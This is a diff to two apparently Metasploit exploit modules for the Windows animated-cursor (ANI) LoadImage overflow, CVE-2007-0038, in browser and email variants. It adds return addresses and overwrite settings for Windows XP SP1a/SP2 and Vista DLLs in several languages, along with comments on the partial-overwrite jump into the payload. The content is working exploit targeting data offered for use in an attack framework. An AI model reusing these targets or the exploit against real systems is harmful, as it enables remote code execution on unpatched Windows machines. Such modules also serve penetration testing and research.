diff --git a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb index 967e04ffd7..313ff4a496 100644 --- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb @@ -96,16 +96,37 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote # Should work for English 2000 SP0-SP4+ [ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }], - - + # # Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start # of the RIFF chunk itself. The length field of the RIFF chunk # tag contains a short jump into an embedded riff chunk that # makes a long relative jump into the actual payload. # - [ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ] - + [ 'Windows Vista user32.dll 6.0.6000.16386', + { + 'Ret' => 0x700b, + 'Len' => 2, + + # On Vista, the pages that contain the RIFF are read-only. + # In-place decoders cannot be used. + 'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw } + } + ], + + # + # Supplied by ramon[at]risesecurity.org + # + + # call [ebx+4] + [ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }], + [ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }], + [ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }], + [ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }], + + # call [esi+4] + [ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }], + [ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }] ], 'DisclosureDate' => 'Mar 28 2007', 'DefaultTarget' => 0)) diff --git a/modules/exploits/windows/email/ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ani_loadimage_chunksize.rb index 8040595850..cca30c2a00 100644 --- a/modules/exploits/windows/email/ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ani_loadimage_chunksize.rb @@ -94,9 +94,8 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote [ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }], # Should work for English 2000 SP0-SP4+ - [ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }], - - + [ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }], + # # Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start # of the RIFF chunk itself. The length field of the RIFF chunk @@ -112,7 +111,21 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote # In-place decoders cannot be used. 'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw } } - ] + ], + + # + # Supplied by ramon[at]risesecurity.org + # + + # call [ebx+4] + [ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }], + [ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }], + [ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }], + [ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }], + + # call [esi+4] + [ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }], + [ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }] ], 'DisclosureDate' => 'Mar 28 2007', 'DefaultTarget' => 0))